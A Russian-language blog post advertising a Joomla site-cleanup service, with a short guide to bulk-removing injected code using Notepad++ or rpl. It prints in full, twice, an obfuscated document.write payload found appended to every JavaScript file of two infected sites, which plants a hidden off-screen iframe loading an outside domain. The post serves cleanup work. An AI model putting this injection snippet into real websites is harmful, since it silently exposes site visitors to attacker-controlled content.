Чистка заражённого сайта на Joomla

Люто ненавижу тех, кто пишет зловредин и взламывает сайты простых людей, для рассылки спама или показа рекламы. Да, бывают случаи, когда я готов принять взлом, как необходимое зло. Например, как форма протеста. Но когда бот-сети ломают мирные сайты и блоги лишь для того, чтобы заработать пару сотен баксов - поубивал бы.

Запускаю новую услугу - очистка взломанных сайтов на Joomla - стоимость от 500 грн./2000 руб./$65. Как и раньше социальные проекты, некоммерческие сайты или просто офигенские проекты обслуживаются бесплатно.

Для тех же, кто предпочитает во всём разобраться сам, расскажу несколько простых рецептов, которые помогут в лечении Joomla от взлома.

Поиск и замена текста в нескольких файлах.

Объяснять буду на реальных примерах. Недавно чистил 2 сайта на Joomla 1.5. В конец всех файлов JavaScript был внедрён следующий код:

;document.write(unescape('%3C%73%63%72%69%70%74%3E%0A%76%61%72%20%5F%30%78%61%62%31%65%3D%5B%22%5C%78%33%43%5C%78%36%34%5C%78%36%39%5C%78%37%36%5C%78%32%30%5C%78%37%33%5C%78%37%34%5C%78%37%39%5C%78%36%43%5C%78%36%35%5C%78%33%44%5C%78%32%32%5C%78%37%30%5C%78%36%46%5C%78%37%33%5C%78%36%39%5C%78%37%34%5C%78%36%39%5C%78%36%46%5C%78%36%45%5C%78%33%41%5C%78%36%31%5C%78%36%32%5C%78%37%33%5C%78%36%46%5C%78%36%43%5C%78%37%35%5C%78%37%34%5C%78%36%35%5C%78%33%42%5C%78%32%30%5C%78%37%34%5C%78%36%46%5C%78%37%30%5C%78%33%41%5C%78%32%44%5C%78%33%35%5C%78%33%30%5C%78%33%38%5C%78%37%30%5C%78%37%38%5C%78%33%42%5C%78%32%32%5C%78%33%45%5C%78%33%43%5C%78%36%39%5C%78%36%36%5C%78%37%32%5C%78%36%31%5C%78%36%44%5C%78%36%35%5C%78%32%30%5C%78%37%33%5C%78%37%32%5C%78%36%33%5C%78%33%44%5C%78%32%32%5C%78%36%38%5C%78%37%34%5C%78%37%34%5C%78%37%30%5C%78%33%41%5C%78%32%46%5C%78%32%46%5C%78%36%41%5C%78%37%31%5C%78%37%35%5C%78%36%35%5C%78%37%32%5C%78%37%39%5C%78%36%41%5C%78%37%33%5C%78%37%33%5C%78%36%33%5C%78%37%32%5C%78%36%39%5C%78%37%30%5C%78%37%34%5C%78%32%45%5C%78%37%32%5C%78%37%35%5C%78%32%46%5C%78%32%32%5C%78%33%45%5C%78%33%43%5C%78%32%46%5C%78%36%39%5C%78%36%36%5C%78%37%32%5C%78%36%31%5C%78%36%44%5C%78%36%35%5C%78%33%45%5C%78%33%43%5C%78%32%46%5C%78%36%34%5C%78%36%39%5C%78%37%36%5C%78%33%45%22%2C%22%5C%78%37%37%5C%78%37%32%5C%78%36%39%5C%78%37%34%5C%78%36%35%22%5D%3B%64%6F%63%75%6D%65%6E%74%5B%5F%30%78%61%62%31%65%5B%31%5D%5D%28%5F%30%78%61%62%31%65%5B%30%5D%29%3B%0A%3C%2F%73%63%72%69%70%74%3E'));

В ручную удалять этот код из пяти сотен файлов будет очень долго. Тем у кого глупый виндовс рекомендую использовать Notepad++ и "поиск и замену в файлах". Счастливым пользователям линукс, достаточно установить rpl: sudo apt-get install rpl.

Теперь поиск и замена в куче файлов пройдёт за несколько секунд: rpl -i -R -a -x .js "Текст который ищем" "Текст на который меняем" /путь/к/папке/в/которой/ищем/

Реальный пример:

rpl -i -R -a -x .js  ";document.write(unescape('%3C%73%63%72%69%70%74%3E%0A%76%61%72%20%5F%30%78%61%62%31%65%3D%5B%22%5C%78%33%43%5C%78%36%34%5C%78%36%39%5C%78%37%36%5C%78%32%30%5C%78%37%33%5C%78%37%34%5C%78%37%39%5C%78%36%43%5C%78%36%35%5C%78%33%44%5C%78%32%32%5C%78%37%30%5C%78%36%46%5C%78%37%33%5C%78%36%39%5C%78%37%34%5C%78%36%39%5C%78%36%46%5C%78%36%45%5C%78%33%41%5C%78%36%31%5C%78%36%32%5C%78%37%33%5C%78%36%46%5C%78%36%43%5C%78%37%35%5C%78%37%34%5C%78%36%35%5C%78%33%42%5C%78%32%30%5C%78%37%34%5C%78%36%46%5C%78%37%30%5C%78%33%41%5C%78%32%44%5C%78%33%35%5C%78%33%30%5C%78%33%38%5C%78%37%30%5C%78%37%38%5C%78%33%42%5C%78%32%32%5C%78%33%45%5C%78%33%43%5C%78%36%39%5C%78%36%36%5C%78%37%32%5C%78%36%31%5C%78%36%44%5C%78%36%35%5C%78%32%30%5C%78%37%33%5C%78%37%32%5C%78%36%33%5C%78%33%44%5C%78%32%32%5C%78%36%38%5C%78%37%34%5C%78%37%34%5C%78%37%30%5C%78%33%41%5C%78%32%46%5C%78%32%46%5C%78%36%41%5C%78%37%31%5C%78%37%35%5C%78%36%35%5C%78%37%32%5C%78%37%39%5C%78%36%41%5C%78%37%33%5C%78%37%33%5C%78%36%33%5C%78%37%32%5C%78%36%39%5C%78%37%30%5C%78%37%34%5C%78%32%45%5C%78%37%32%5C%78%37%35%5C%78%32%46%5C%78%32%32%5C%78%33%45%5C%78%33%43%5C%78%32%46%5C%78%36%39%5C%78%36%36%5C%78%37%32%5C%78%36%31%5C%78%36%44%5C%78%36%35%5C%78%33%45%5C%78%33%43%5C%78%32%46%5C%78%36%34%5C%78%36%39%5C%78%37%36%5C%78%33%45%22%2C%22%5C%78%37%37%5C%78%37%32%5C%78%36%39%5C%78%37%34%5C%78%36%35%22%5D%3B%64%6F%63%75%6D%65%6E%74%5B%5F%30%78%61%62%31%65%5B%31%5D%5D%28%5F%30%78%61%62%31%65%5B%30%5D%29%3B%0A%3C%2F%73%63%72%69%70%74%3E'));" ""  /var/www/example/data/www/example.com/

В данном случае зловредина "умножается на 0"

Это не полный комплекс мер по очистке сайта! Вам так же нужно сменить все пароли, найти и обезвредить все php-шелы, а так же прочие чужеродные файлы. Об этом я подробнее расскажу в другой раз.
Что бы заказать очистку вашего Joomla сайта от вирусов или последствий взлома пишите на info@alexander.khmelnitskiy.ua или звоните +380971002825.

Add comment


Security code
Refresh

Found a typo? Please select it and press Ctrl + Enter.